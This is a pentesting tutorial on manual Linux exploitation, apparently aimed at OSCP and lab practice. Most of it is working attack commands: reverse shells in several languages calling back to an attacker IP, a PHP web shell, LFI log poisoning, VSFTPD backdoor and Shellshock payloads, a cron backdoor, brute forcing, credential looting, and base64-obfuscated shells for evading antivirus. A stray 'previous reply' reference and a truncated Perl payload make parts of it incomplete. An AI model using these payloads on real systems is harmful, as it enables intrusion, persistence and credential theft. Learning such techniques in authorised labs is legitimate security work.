Manual Exploitation for Pentesters: Linux Edition
Metasploit is powerful, but real pentesters know how to operate without it. Whether you’re on a system where it’s not allowed, prepping for a cert like OSCP, or just want to understand how the mother f*cker gets hacked—this guide will walk you through manual exploitation from start to shell, with nothing but raw tools and skill.
Table of Contents
- Why Go Manual?
- Recon & Enumeration
- Service-by-Service Exploitation
- Getting and Managing a Shell
- Privilege Escalation
- Post-Exploitation: Looting & Cleanup
- Buffer Overflow Basics (Manual)
- Stealth Tips: AV/EDR Evasion
- TryHackMe Labs for Practice
- Conclusion
Why Go Manual?
- Real Understanding – Learn how exploits actually work.
- Less Detection – Tools like
netcatandcurldon’t trip alarms like Metasploit. - Cert Prep – OSCP limits Metasploit use to one exploit.
- Raw Power – Manual is flexible, adaptable, and battle-tested.
Recon & Enumeration
Basic Nmap
nmap -sC -sV -oN nmap_basic.txt 10.10.10.10
Service Fingerprinting
| Protocol | Tool |
|---|---|
| FTP | ftp, nc, nmap -p21 --script ftp* |
| HTTP | curl, nikto, gobuster, whatweb, dirb, ffuf |
| SMB | enum4linux, smbclient, rpcclient, nmap --script smb* |
| SSH | Banner grabbing + brute with hydra or ncrack |
| DNS | dig, dnsrecon, nslookup |
Brute Force Example
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials"
Service-by-Service Exploitation
FTP – VSFTPD 2.3.4
Banner Grab:
nc -nv 10.10.10.10 21
Exploit the Backdoor:
telnet 10.10.10.10 21
# USER whatever:)
# PASS whatever
Get Shell:
nc 10.10.10.10 6200
HTTP – LFI to RCE
1. LFI Read:
curl http://10.10.10.10/index.php?page=../../../../etc/passwd
2. Log Poisoning for RCE:
curl -A "<?php system($_GET['cmd']); ?>" http://10.10.10.10
curl "http://10.10.10.10/index.php?page=/var/log/apache2/access.log&cmd=id"
3. PHP Web Shell Upload:
<?php system($_GET['cmd']); ?>
Access:
curl "http://10.10.10.10/uploads/shell.php?cmd=whoami"
Directory Bruteforce:
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt
SMB – Null Sessions & Remote Execution
List Shares:
smbclient -L //10.10.10.10/ -N
Access Share:
smbclient //10.10.10.10/anonymous -N
Remote Shell with Creds:
impacket-psexec user:pass@10.10.10.10
Shellshock (CVE-2014-6271)
curl -H 'User-Agent: () { :; }; /bin/bash -c "id"' http://10.10.10.10/cgi-bin/vulnerable.cgi
SUID, Cron, NFS
SUID Binaries:
find / -perm -4000 -type f 2>/dev/null
Exploit:
find . -exec /bin/sh -p \; -quit
Cron Job Backdoor:
echo "bash -i >& /dev/tcp/10.10.14.25/4444 0>&1" > /tmp/root.sh
chmod +x /tmp/root.sh
Getting and Managing a Shell
Upgrade Netcat Shell
# In shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z
# In your terminal:
stty raw -echo
fg
export TERM=xterm
Reverse Shell Cheatsheet
| Language | Payload |
|---|---|
| Bash | bash -i >& /dev/tcp/10.10.14.25/4444 0>&1 |
| Python | python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("10.10.14.25",4444)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/bash"])' |
| PHP | php -r '$sock=fsockopen("10.10.14.25",4444);exec("/bin/sh -i <&3 >&3 2>&3");' |
| Perl | perl -e 'use Socket;$i="10.10.14.25";$p=4444;...' |
| PowerShell | See full payload in previous reply |
Privilege Escalation
Basic Checks
whoami
id
uname -a
sudo -l
Manual Looting
cat ~/.bash_history
cat /etc/passwd
grep -i pass /etc/* 2>/dev/null
find / -name "*id_rsa*" 2>/dev/null
LinPEAS / LinEnum
wget http://10.10.14.25/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
Exploit Sudo Rights
sudo /usr/bin/vim
# :!bash
Post-Exploitation: Looting & Cleanup
Credentials & Sensitive Files
cat /var/www/html/config.php
grep -i "password" /var/* 2>/dev/null
Pivoting
ssh -L 1080:127.0.0.1:9050 user@pivot-host
Cleanup
- Remove shells:
rm shell.php - Remove cron backdoors
- Exit gracefully
Buffer Overflow Basics (Manual)
void secret() { system("/bin/sh"); }
int main(int argc, char *argv[]) {
char buffer[64];
strcpy(buffer, argv[1]);
}
Compile:
gcc -fno-stack-protector -z execstack vuln.c -o vuln
Exploit:
./vuln $(python3 -c 'print("A"*72 + "\xef\xbe\xad\xde")')
Stealth Tips: AV/EDR Evasion (Manual)
Obfuscate Payload
echo 'bash -i >& /dev/tcp/10.10.14.25/4444 0>&1' | base64
# Decode & execute on target:
echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yNS80NDQ0IDA+JjE=' | base64 -d | bash
TryHackMe Labs for Practice
Conclusion
Manual exploitation makes you sharper, stealthier, and more capable. Tools help, but skills win. Every command you run by hand teaches you how the system really works—and that’s the difference between a script kiddie and a true offensive cyber professional.
If you can root a box without Metasploit, you can root it with anything.